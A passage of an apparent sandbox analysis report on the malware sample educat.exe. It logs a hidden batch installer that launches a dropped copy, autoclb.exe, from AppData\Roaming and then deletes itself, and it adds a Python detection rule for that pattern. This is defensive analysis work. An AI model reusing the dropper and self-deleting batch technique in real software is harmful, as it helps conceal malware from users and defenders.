Enumerate Keys HKEY_USERS - True 1 Fn
Enumerate Keys HKEY_USERS - True 1 Fn
Enumerate Keys HKEY_USERS - False 1 Fn
Process (2)
Operation Process Additional Information Success Count Logfile
Create C:\Users\CIIHMN~1\AppData\Local\Temp\74EE\11F7.bat show_window = SW_HIDE True 1 Fn
Open c:\windows\explorer.exe desired_access = PROCESS_QUERY_INFORMATION True 1 Fn
Module (9)
Operation Module Additional Information Success Count Logfile
Get Handle c:\users\ciihmnxmn6ps\desktop\educat.exe base_address = 0x400000 True 3 Fn
Get Handle c:\windows\syswow64\kernel32.dll base_address = 0x75260000 True 1 Fn
Get Handle c:\windows\syswow64\user32.dll base_address = 0x77150000 True 1 Fn
Get Handle c:\windows\syswow64\ntdll.dll base_address = 0x77ca0000 True 1 Fn
Get Filename c:\users\ciihmnxmn6ps\desktop\educat.exe process_name = c:\users\ciihmnxmn6ps\desktop\educat.exe, file_name_orig = C:\Users\CIiHmnxMn6Ps\Desktop\educat.exe, size = 260 True 1 Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsWow64Process, address_out = 0x752796e0 True 1 Fn
Get Address c:\windows\syswow64\user32.dll function = GetWindowThreadProcessId, address_out = 0x7716ba70 True 1 Fn
Window (1)
Operation Window Name Additional Information Success Count Logfile
Find - class_name = ProgMan True 1 Fn
System (17)
Operation Additional Information Success Count Logfile
Get Computer Name result_out = LHNIWSJ True 1 Fn
Sleep duration = 500 milliseconds (0.500 seconds) True 10 Fn
Get Time type = Ticks, time = 130187 True 1 Fn
Get Time type = Ticks, time = 135671 True 4 Fn
Get Info type = Operating System True 1 Fn
Process #3: cmd.exe
254 0
Information Value
ID #3
File Name c:\windows\syswow64\cmd.exe
Command Line C:\Windows\system32\cmd.exe /c ""C:\Users\CIIHMN~1\AppData\Local\Temp\74EE\11F7.bat" "C:\Users\CIIHMN~1\AppData\Roaming\adsldraw\autoclb.exe" "C:\Users\CIIHMN~1\Desktop\educat.exe""
Initial Working Directory C:\Users\CIiHmnxMn6Ps\Desktop\
Monitor Start Time: 00:00:58, Reason: Child Process
Unmonitor End Time: 00:01:11, Reason: Self Terminated
Monitor Duration 00:00:13
OS Process Information
Information Value
PID 0xf40
Parent PID 0xda4 (c:\users\ciihmnxmn6ps\desktop\educat.exe)
Is Created or Modified Executable False
Integrity Level High (Elevated)
Username LHNIWSJ\CIiHmnxMn6Ps
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0xf44
0xf98
Region
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000400000 0x00400000 0x0041ffff Private Memory rw True False False -
pagefile_0x0000000000400000 0x00400000 0x0040ffff Pagefile Backed Memory rw True False False -
private_0x0000000000410000 0x00410000 0x00413fff Private Memory rw True False False -
private_0x0000000000420000 0x00420000 0x00421fff Private Memory rw True False False -
private_0x0000000000420000 0x00420000 0x00423fff Private Memory rw True False False -
pagefile_0x0000000000430000 0x00430000 0x00443fff Pagefile Backed Memory r True False False -
private_0x0000000000450000 0x00450000 0x0048ffff Private Memory rw True False False -
private_0x0000000000490000 0x00490000 0x0058ffff Private Memory rw True False False -
pagefile_0x0000000000590000 0x00590000 0x00593fff Pagefile Backed Memory r True False False -
pagefile_0x00000000005a0000 0x005a0000 0x005a0fff Pagefile Backed Memory r True False False -
private_0x00000000005b0000 0x005b0000 0x005b1fff Private Memory rw True False False -
private_0x00000000005c0000 0x005c0000 0x005cffff Private Memory rw True False False -
locale.nls 0x005d0000 0x0068dfff Memory Mapped File r False False False -
private_0x0000000000690000 0x00690000 0x006cffff Private Memory rw True False False -
private_0x00000000006d0000 0x006d0000 0x006dffff Private Memory rw True False False -
cmd.exe.mui 0x006e0000 0x00700fff Memory Mapped File r False False False -
private_0x00000000007b0000 0x007b0000 0x008affff Private Memory rw True False False -
private_0x00000000008b0000 0x008b0000 0x009affff Private Memory rw True False False -
cmd.exe 0x009e0000 0x00a2ffff Memory Mapped File rwx True False False -
pagefile_0x0000000000a30000 0x00a30000 0x04a2ffff Pagefile Backed Memory - True False False -
private_0x0000000004bd0000 0x04bd0000 0x04bdffff Private Memory rw True False False -
sortdefault.nls 0x04be0000 0x04f16fff Memory Mapped File r False False False -
wow64cpu.dll 0x64ae0000 0x64ae7fff Memory Mapped File rwx False False False -
wow64win.dll 0x64af0000 0x64b62fff Memory Mapped File rwx False False False -
wow64.dll 0x64b70000 0x64bbefff Memory Mapped File rwx False False False -
cmdext.dll 0x74bf0000 0x74bf7fff Memory Mapped File rwx False False False -
bcryptprimitives.dll 0x74d40000 0x74d98fff Memory Mapped File rwx False False False -
cryptbase.dll 0x74da0000 0x74da9fff Memory Mapped File rwx False False False -
sspicli.dll 0x74db0000 0x74dcdfff Memory Mapped File rwx False False False -
kernelbase.dll 0x74e70000 0x74fe5fff Memory Mapped File rwx False False False -
kernel32.dll 0x75260000 0x7534ffff Memory Mapped File rwx False False False -
advapi32.dll 0x76a10000 0x76a8afff Memory Mapped File rwx False False False -
sechost.dll 0x76c40000 0x76c82fff Memory Mapped File rwx False False False -
rpcrt4.dll 0x76d90000 0x76e3bfff Memory Mapped File rwx False False False -
msvcrt.dll 0x779f0000 0x77aadfff Memory Mapped File rwx False False False -
ntdll.dll 0x77ca0000 0x77e18fff Memory Mapped File rwx False False False -
pagefile_0x000000007e960000 0x7e960000 0x7ea5ffff Pagefile Backed Memory r True False False -
pagefile_0x000000007ea60000 0x7ea60000 0x7ea82fff Pagefile Backed Memory r True False False -
private_0x000000007ea87000 0x7ea87000 0x7ea87fff Private Memory rw True False False -
private_0x000000007ea88000 0x7ea88000 0x7ea8afff Private Memory rw True False False -
private_0x000000007ea8b000 0x7ea8b000 0x7ea8dfff Private Memory rw True False False -
private_0x000000007ea8e000 0x7ea8e000 0x7ea8efff Private Memory rw True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory r True False False -
private_0x000000007fff0000 0x7fff0000 0x7df8ee37ffff Private Memory r True False False -
pagefile_0x00007df8ee380000 0x7df8ee380000 0x7ff8ee37ffff Pagefile Backed Memory - True False False -
ntdll.dll 0x7ff8ee380000 0x7ff8ee541fff Memory Mapped File rwx False False False -
private_0x00007ff8ee542000 0x7ff8ee542000 0x7ffffffeffff Private Memory r True False False -
Host Behavior
File (202)
Operation Filename Additional Information Success Count
Create C:\Users\CIIHMN~1\AppData\Local\Temp\74EE\11F7.bat desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 3
Create C:\Users\CIIHMN~1\AppData\Local\Temp\74EE\11F7.bat desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 3
Create C:\Users\CIIHMN~1\AppData\Local\Temp\74EE\11F7.bat desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE False 1
Get Info C:\Users\CIiHmnxMn6Ps\Desktop type = file_attributes True 2
Get Info "C:\Users\CIIHMN~1\AppData\Local\Temp\74EE\11F7.bat" type = file_attributes False 1
Get Info - type = file_type True 3
Get Info STD_OUTPUT_HANDLE type = file_type True 25
Get Info - type = file_type True 3
Get Info C:\Users\CIIHMN~1\AppData\Local\Temp\74EE\11F7.bat type = file_attributes True 2
Get Info C:\Users\CIIHMN~1\AppData\Local\Temp\74EE type = file_attributes True 1
Get Info STD_ERROR_HANDLE type = file_type True 1
Open STD_OUTPUT_HANDLE - True 88
Open STD_INPUT_HANDLE - True 7
Open - - True 12
Open - - True 13
Open \??\C:\Users\CIIHMN~1\AppData\Local\Temp\74EE\11F7.bat desired_access = DELETE, open_options = FILE_NON_DIRECTORY_FILE, FILE_DELETE_ON_CLOSE, FILE_OPEN_FOR_BACKUP_INTENT, share_mode = FILE_SHARE_DELETE True 1
Open STD_ERROR_HANDLE - True 3
Read - size = 8191, size_out = 110 True 1
Read - size = 8191, size_out = 99 True 1
Read - size = 8191, size_out = 66 True 1
Read - size = 8191, size_out = 50 True 1
Read - size = 8191, size_out = 19 True 1
Read - size = 8191, size_out = 6 True 1
Read - size = 8191, size_out = 0 True 1
Write STD_OUTPUT_HANDLE size = 2 True 8
Write STD_OUTPUT_HANDLE size = 30 True 4
Write STD_OUTPUT_HANDLE size = 3 True 4
Write STD_OUTPUT_HANDLE size = 4 True 3
Write STD_OUTPUT_HANDLE size = 63 True 1
Write STD_OUTPUT_HANDLE size = 12 True 1
Write STD_OUTPUT_HANDLE size = 102 True 1
Write STD_OUTPUT_HANDLE size = 13 True 1
Write STD_OUTPUT_HANDLE size = 10 True 1
Write STD_OUTPUT_HANDLE size = 54 True 1
Write STD_ERROR_HANDLE size = 33 True 1
Registry (17)
Operation Key Additional Information Success Count
Open Key HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System - False 1
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor - True 1
Open Key HKEY_CURRENT_USER\Software\Microsoft\Command Processor - True 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 121, type = REG_NONE False 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = AutoRun, data = 64, type = REG_NONE False 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 64, type = REG_NONE False 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = AutoRun, data = 9, type = REG_NONE False 1
Process (1)
Operation Process Additional Information Success Count
Create C:\Windows\system32\cmd.exe os_pid = 0xf9c, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL True 1
Module (8)
Operation Module Additional Information Success Count
Get Handle c:\windows\syswow64\cmd.exe base_address = 0x9e0000 True 1
Get Handle c:\windows\syswow64\kernel32.dll base_address = 0x75260000 True 2
Get Filename - process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 True 1
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadUILanguage, address_out = 0x752a2780 True 1
Get Address c:\windows\syswow64\kernel32.dll function = CopyFileExW, address_out = 0x7527fa80 True 1
Get Address c:\windows\syswow64\kernel32.dll function = IsDebuggerPresent, address_out = 0x7527a790 True 1
Get Address c:\windows\syswow64\kernel32.dll function = SetConsoleInputExeNameW, address_out = 0x74f835c0 True 1
Environment (24)
Operation Additional Information Success Count
Get Environment String - True 7
Get Environment String name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ True 3
Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 4
Get Environment String name = PROMPT False 1
Get Environment String name = COMSPEC, result_out = C:\Windows\system32\cmd.exe True 1
Get Environment String name = KEYS False 1
Get Environment String name = PROMPT, result_out = $P$G True 2
Set Environment String name = PROMPT, value = $P$G True 1
Set Environment String name = =C:, value = C:\Users\CIiHmnxMn6Ps\Desktop True 1
Set Environment String name = COPYCMD True 1
Set Environment String name = =ExitCode, value = 00000000 True 1
Set Environment String name = =ExitCodeAscii True 1
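Process #3 is the installer stage of this sample: cmd.exe runs a batch file from the user's Temp directory, passing it the dropped copy under AppData\Roaming (autoclb.exe) and the original sample (educat.exe) as %1 and %2, reads the script in 8191-byte chunks, spawns the dropped copy through a second cmd /C, and finally opens the script with DELETE access and FILE_DELETE_ON_CLOSE, which is how a batch file erases itself once it has been read. Two details matter when turning this into a rule. First, the File Name column shows syswow64\cmd.exe although the command line names system32: the 32-bit parent is subject to WoW64 file-system redirection, so image-path matches have to accept both directories. Second, the paths appear in 8.3 short form (CIIHMN~1 is the same directory as CIiHmnxMn6Ps), so rows about the same file must be compared as printed rather than after any expansion. The following Python is an added example, not part of the VMRay report or of the sample: it models a few of the rows above as constructed records and flags the Temp-script plus self-delete plus AppData\Roaming-executable combination. The Event layout, the field names and the function names are assumptions made for this example.

```python
from __future__ import annotations

import re
from dataclasses import dataclass, field

QUOTED = re.compile(r'"([^"]+)"')


@dataclass
class Event:
    """One sandbox row, constructed for this example (not a VMRay structure)."""
    pid: int                 # process that performed the operation
    op: str                  # process_create | file_create | file_open
    path: str = ""           # image path or file path
    info: dict = field(default_factory=dict)


def cmd_args(cmdline: str) -> list[str]:
    """Return the quoted tokens of a cmd.exe /c command line.

    The report shows cmd /c ""script.bat" "arg1" "arg2"": cmd strips the
    outer quote pair, so the remaining quoted tokens are the script and
    its %1, %2 arguments. The empty pair "" at the start never matches."""
    return QUOTED.findall(cmdline)


def norm(path: str) -> str:
    """Comparable form of a path: NT object prefix removed, case folded.

    Short names (CIIHMN~1) are left as the sandbox printed them; they
    cannot be expanded offline, and both rows we compare use the same form."""
    if path.startswith("\\??\\"):
        path = path[4:]
    return path.lower()


def find_self_deleting_batch(events: list[Event]) -> list[dict]:
    """Flag cmd.exe instances that run a script from a Temp directory,
    pass it a dropped executable under AppData\\Roaming, and then open
    that script with DELETE access and FILE_DELETE_ON_CLOSE."""
    findings = []
    for ev in events:
        if ev.op != "process_create" or not ev.path.lower().endswith("cmd.exe"):
            continue                                   # accepts system32 and syswow64
        args = cmd_args(ev.info.get("cmdline", ""))
        if not args or not args[0].lower().endswith((".bat", ".cmd")):
            continue
        script = norm(args[0])
        if "\\temp\\" not in script:
            continue
        dropped = [a for a in args[1:]
                   if a.lower().endswith(".exe") and "\\appdata\\roaming\\" in a.lower()]
        self_delete = any(
            e.pid == ev.pid and e.op == "file_open" and norm(e.path) == script
            and "DELETE" in e.info.get("desired_access", "")
            and "FILE_DELETE_ON_CLOSE" in e.info.get("open_options", "")
            for e in events)
        if dropped and self_delete:
            findings.append({"pid": ev.pid, "script": args[0],
                             "dropped_exe": dropped[0], "self_delete": True})
    return findings


BAT = r"C:\Users\CIIHMN~1\AppData\Local\Temp\74EE\11F7.bat"
CMDLINE = (r'C:\Windows\system32\cmd.exe /c ""' + BAT + r'" '
           r'"C:\Users\CIIHMN~1\AppData\Roaming\adsldraw\autoclb.exe" '
           r'"C:\Users\CIIHMN~1\Desktop\educat.exe""')

# Constructed from the Process #3 rows above; the last two records are a
# control (a Temp script that is read but never deleted) and must not fire.
SAMPLE = [
    Event(0xf40, "process_create", r"c:\windows\syswow64\cmd.exe", {"cmdline": CMDLINE}),
    Event(0xf40, "file_create", BAT, {"desired_access": "GENERIC_READ"}),
    Event(0xf40, "file_open", "\\??\\" + BAT,
          {"desired_access": "DELETE",
           "open_options": "FILE_NON_DIRECTORY_FILE, FILE_DELETE_ON_CLOSE, FILE_OPEN_FOR_BACKUP_INTENT"}),
    Event(0x123, "process_create", r"c:\windows\system32\cmd.exe",
          {"cmdline": r'cmd.exe /c ""C:\Users\ADMIN\AppData\Local\Temp\fix.bat" "C:\Tools\x.exe""'}),
    Event(0x123, "file_create", r"C:\Users\ADMIN\AppData\Local\Temp\fix.bat",
          {"desired_access": "GENERIC_READ"}),
]

if __name__ == "__main__":
    for hit in find_self_deleting_batch(SAMPLE):
        print(f"pid {hit['pid']:#x}: {hit['script']} self-deleted after launching {hit['dropped_exe']}")
```

The self-delete check is keyed on the open with DELETE access and FILE_DELETE_ON_CLOSE rather than on a separate delete event, because that is the only trace a `del "%~f0"` at the end of a batch file leaves in a log like this one; the script's contents themselves are not in the report, so the rule does not depend on them.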
Process #5: cmd.exe
Information Value
ID #5
File Name c:\windows\syswow64\cmd.exe
Command Line cmd /C ""C:\Users\CIIHMN~1\AppData\Roaming\adsldraw\autoclb.exe" "C:\Users\CIIHMN~1\Desktop\educat.exe""
Initial Working Directory C:\Users\CIiHmnxMn6Ps\Desktop\
Monitor Start Time: 00:01:05, Reason: Child Process
Unmonitor End Time: 00:01:11, Reason: Self Terminated
Monitor Duration 00:00:06
OS Process Information
Information Value
PID 0xf9c
Parent PID 0xf40 (c:\windows\syswow64\cmd.exe)
Is Created or Modified Executable False
Integrity Level High (Elevated)
Username LHNIWSJ\CIiHmnxMn6Ps
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs 0xFA0, 0xFA4
Region
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000280000 0x00280000 0x0029ffff Private Memory rw True False False -
pagefile_0x0000000000280000 0x00280000 0x0028ffff Pagefile Backed Memory rw True False False -
private_0x0000000000290000 0x00290000 0x00293fff Private Memory rw True False False -
private_0x00000000002a0000 0x002a0000 0x002a1fff Private Memory rw True False False -
private_0x00000000002a0000 0x002a0000 0x002a3fff Private Memory rw True False False -
pagefile_0x00000000002b0000 0x002b0000 0x002c3fff Pagefile Backed Memory r True False False -
private_0x00000000002d0000 0x002d0000 0x0030ffff Private Memory rw True False False -
private_0x0000000000310000 0x00310000 0x0040ffff Private Memory rw True False False -
pagefile_0x0000000000410000 0x00410000 0x00413fff Pagefile Backed Memory r True False False -
pagefile_0x0000000000420000 0x00420000 0x00420fff Pagefile Backed Memory r True False False -
private_0x0000000000430000 0x00430000 0x00431fff Private Memory rw True False False -
private_0x0000000000440000 0x00440000 0x0047ffff Private Memory rw True False False -
private_0x00000000004c0000 0x004c0000 0x004cffff Private Memory rw True False False -
private_0x00000000004d0000 0x004d0000 0x004dffff Private Memory rw True False False -
private_0x0000000000520000 0x00520000 0x0061ffff Private Memory rw True False False -
locale.nls 0x00620000 0x006ddfff Memory Mapped File r False False False -
private_0x00000000006e0000 0x006e0000 0x007dffff Private Memory rw True False False -
cmd.exe 0x009e0000 0x00a2ffff Memory Mapped File rwx True False False -
pagefile_0x0000000000a30000 0x00a30000 0x04a2ffff Pagefile Backed Memory - True False False -
sortdefault.nls 0x04a30000 0x04d66fff Memory Mapped File r False False False -
wow64cpu.dll 0x64ae0000 0x64ae7fff Memory Mapped File rwx False False False -
wow64win.dll 0x64af0000 0x64b62fff Memory Mapped File rwx False False False -
wow64.dll 0x64b70000 0x64bbefff Memory Mapped File rwx False False False -
apphelp.dll 0x74ca0000 0x74d30fff Memory Mapped File rwx False False False -
kernelbase.dll 0x74e70000 0x74fe5fff Memory Mapped File rwx False False False -
kernel32.dll 0x75260000 0x7534ffff Memory Mapped File rwx False False False -
msvcrt.dll 0x779f0000 0x77aadfff Memory Mapped File rwx False False False -
ntdll.dll 0x77ca0000 0x77e18fff Memory Mapped File rwx False False False -
sysmain.sdb 0x7e4e0000 0x7e86ffff Memory Mapped File r False False False -
pagefile_0x000000007e870000 0x7e870000 0x7e96ffff Pagefile Backed Memory r True False False -
pagefile_0x000000007e970000 0x7e970000 0x7e992fff Pagefile Backed Memory r True False False -
private_0x000000007e996000 0x7e996000 0x7e996fff Private Memory rw True False False -
private_0x000000007e999000 0x7e999000 0x7e99bfff Private Memory rw True False False -
private_0x000000007e99c000 0x7e99c000 0x7e99efff Private Memory rw True False False -
private_0x000000007e99f000 0x7e99f000 0x7e99ffff Private Memory rw True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory r True False False -
private_0x000000007fff0000 0x7fff0000 0x7df8ee37ffff Private Memory r True False False -
pagefile_0x00007df8ee380000 0x7df8ee380000 0x7ff8ee37ffff Pagefile Backed Memory - True False False -
ntdll.dll 0x7ff8ee380000 0x7ff8ee541fff Memory Mapped File rwx False False False -
private_0x00007ff8ee542000 0x7ff8ee542000 0x7ffffffeffff Private Memory r True False False -
Host Behavior
File (10)
Operation Filename Additional Information Success Count
Get Info C:\Users\CIiHmnxMn6Ps\Desktop type = file_attributes True 2
Get Info "C:\Users\CIIHMN~1\AppData\Roaming\adsldraw\autoclb.exe" type = file_attributes False 1
Open STD_OUTPUT_HANDLE - True 5
Open STD_INPUT_HANDLE - True 2
Registry (17)
Operation Key Additional Information Success Count
Open Key HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System - False 1
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor - True 1
Open Key HKEY_CURRENT_USER\Software\Microsoft\Command Processor - True 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 248, type = REG_NONE False 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = AutoRun, data = 64, type = REG_NONE False 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 64, type = REG_NONE False 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = AutoRun, data = 9, type = REG_NONE False 1
Process (1)
Operation Process Additional Information Success Count
Create C:\Users\CIIHMN~1\AppData\Roaming\adsldraw\autoclb.exe os_pid = 0xfa8, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL True 1
Module (8)
Operation Module Additional Information Success Count
Get Handle c:\windows\syswow64\cmd.exe base_address = 0x9e0000 True 1
Get Handle c:\windows\syswow64\kernel32.dll base_address = 0x75260000 True 2
Get Filename - process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 True 1
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadUILanguage, address_out = 0x752a2780 True 1
Get Address c:\windows\syswow64\kernel32.dll function = CopyFileExW, address_out = 0x7527fa80 True 1
Get Address c:\windows\syswow64\kernel32.dll function = IsDebuggerPresent, address_out = 0x7527a790 True 1
Get Address c:\windows\syswow64\kernel32.dll function = SetConsoleInputExeNameW, address_out = 0x74f835c0 True 1
Environment (16)
Operation Additional Information Success Count
Get Environment String - True 6
Get Environment String name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ True 1
Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 2
Get Environment String name = PROMPT, result_out = $P$G True 1
Get Environment String name = COMSPEC, result_out = C:\Windows\system32\cmd.exe True 1
Get Environment String name = KEYS False 1
Set Environment String name = =C:, value = C:\Users\CIiHmnxMn6Ps\Desktop True 1
Set Environment String name = COPYCMD True 1
Set Environment String name = =ExitCode, value = 00000000 True 1
Set Environment String name = =ExitCodeAscii True 1
Process #6: autoclb.exe
Information Value
ID #6
File Name c:\users\ciihmn~1\appdata\roaming\adsldraw\autoclb.exe
Command Line "C:\Users\CIIHMN~1\AppData\Roaming\adsldraw\autoclb.exe" "C:\Users\CIIHMN~1\Desktop\educat.exe"
Initial Working Directory C:\Users\CIiHmnxMn6Ps\Desktop\
Monitor Start Time: 00:01:05, Reason: Child Process
Unmonitor End Time: 00:01:11, Reason: Self Terminated
Monitor Duration 00:00:06
OS Process Information
Information Value
PID 0xfa8
Parent PID 0xf9c (c:\windows\syswow64\cmd.exe)
Is Created or Modified Executable False
Integrity Level High (Elevated)
Username LHNIWSJ\CIiHmnxMn6Ps
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs 0xFAC, 0xFB0
Region
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory rw True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory rw True False False -
private_0x0000000000020000 0x00020000 0x00023fff Private Memory rw True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory rw True False False -
private_0x0000000000030000 0x00030000 0x00030fff Private Memory rw True False False -
pagefile_0x0000000000040000 0x00040000 0x00053fff Pagefile Backed Memory r True False False -
private_0x0000000000060000 0x00060000 0x0009ffff Private Memory rw True False False -
private_0x00000000000a0000 0x000a0000 0x0019ffff Private Memory rw True False False -
pagefile_0x00000000001a0000 0x001a0000 0x001a3fff Pagefile Backed Memory r True False False -
pagefile_0x00000000001b0000 0x001b0000 0x001b0fff Pagefile Backed Memory r True False False -
private_0x00000000001c0000 0x001c0000 0x001c1fff Private Memory rw True False False -
private_0x00000000001d0000 0x001d0000 0x001d0fff Private Memory rw True False False -
private_0x00000000001e0000 0x001e0000 0x001effff Private Memory rw True False False -
locale.nls 0x001f0000 0x002adfff Memory Mapped File r False False False -
private_0x00000000002b0000 0x002b0000 0x002b1fff Private Memory rwx True False False -
private_0x00000000002d0000 0x002d0000 0x003cffff Private Memory rw True False False -
autoclb.exe 0x00400000 0x00512fff Memory Mapped File rwx True False False -
private_0x0000000000520000 0x00520000 0x0055ffff Private Memory rw True False False -
private_0x0000000000560000 0x00560000 0x0065ffff Private Memory rw True False False -
pagefile_0x0000000000660000 0x00660000 0x007e7fff Pagefile Backed Memory r True False False -
private_0x00000000007f0000 0x007f0000 0x008affff Private Memory rw True False False -
private_0x00000000007f0000 0x007f0000 0x0085efff Private Memory rwx True False False -
private_0x00000000008a0000 0x008a0000 0x008affff Private Memory rw True False False -
private_0x00000000008b0000 0x008b0000 0x00960fff Private Memory rwx True False False -
private_0x0000000000970000 0x00970000 0x0097ffff Private Memory rw True False False -
pagefile_0x0000000000980000 0x00980000 0x00b00fff Pagefile Backed Memory r True False False -
pagefile_0x0000000000b10000 0x00b10000 0x01f0ffff Pagefile Backed Memory r True False False -
private_0x0000000001f10000 0x01f10000 0x02086fff Private Memory rw True False False -
pagefile_0x0000000001f10000 0x01f10000 0x01f80fff Pagefile Backed Memory rwx True False False -
private_0x00000000020f0000 0x020f0000 0x020fffff Private Memory rw True False False -
private_0x0000000002100000 0x02100000 0x02278fff Private Memory rw True False False -
private_0x0000000002100000 0x02100000 0x02276fff Private Memory rw True False False -
private_0x0000000002280000 0x02280000 0x023f8fff Private Memory rw True False False -
wow64cpu.dll 0x64ae0000 0x64ae7fff Memory Mapped File rwx False False False -
wow64win.dll 0x64af0000 0x64b62fff Memory Mapped File rwx False False False -
wow64.dll 0x64b70000 0x64bbefff Memory Mapped File rwx False False False -
version.dll 0x74b40000 0x74b47fff Memory Mapped File rwx False False False -
comctl32.dll 0x74b50000 0x74be1fff Memory Mapped File rwx False False False -
apphelp.dll 0x74ca0000 0x74d30fff Memory Mapped File rwx False False False -
bcryptprimitives.dll 0x74d40000 0x74d98fff Memory Mapped File rwx False False False -
cryptbase.dll 0x74da0000 0x74da9fff Memory Mapped File rwx False False False -
sspicli.dll 0x74db0000 0x74dcdfff Memory Mapped File rwx False False False -
kernelbase.dll 0x74e70000 0x74fe5fff Memory Mapped File rwx False False False -
kernel32.dll 0x75260000 0x7534ffff Memory Mapped File rwx False False False -
powrprof.dll 0x753b0000 0x753f3fff Memory Mapped File rwx False False False -
